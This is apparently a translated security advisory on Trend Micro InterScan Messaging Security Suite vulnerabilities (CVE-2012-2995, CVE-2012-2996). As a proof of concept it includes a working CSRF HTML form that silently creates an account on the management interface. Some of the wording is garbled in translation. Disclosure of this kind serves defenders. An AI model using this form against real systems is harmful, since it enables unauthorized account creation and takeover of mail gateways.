Release date:
Updated on:
Affected Systems:
Trend Micro InterScan Messaging Security Suite
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55542
Cve id: CVE-2012-2995, CVE-2012-2996
InterScan Messaging Security Suite for SMTP (IMSS) is a high-performance, policy-based gateway Security filtering solution provided by Trend Micro for enterprise IT network resources. IT is deployed on the enterprise's SMTP external gateway.
Trend Micro InterScan Messaging Security Suite has multiple Security vulnerabilities. Attackers can exploit these vulnerabilities to steal Cookie authentication creden。, perform unauthorized operations, and leak sensitive information.
<* Source: Tom Gregory
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<Html>
<Body>
<Form action = "https://www.example.com/saveAccountSubTab.imss" method = "POST">
<Input type = "hidden" name = "enabled" value = "on"/>
<Input type = "hidden" name = "authMethod" value = "1"/>
<Input type = "hidden" name = "name" value = "quorra"/>
<Input type = "hidden" name = "password" value = "quorra & #46; 123"/>
<Input type = "hidden" name = "confirmPwd" value = "quorra & #46; 123"/>
<Input type = "hidden" name = "tabAction" value = "saveAuth"/>
<Input type = "hidden" name = "gotoTab" value = "saveAll"/>
<Input type = "submit" value = "CSRF"/>
</Form>
</Body>
</Html>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Trend Micro
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.antivirus.com/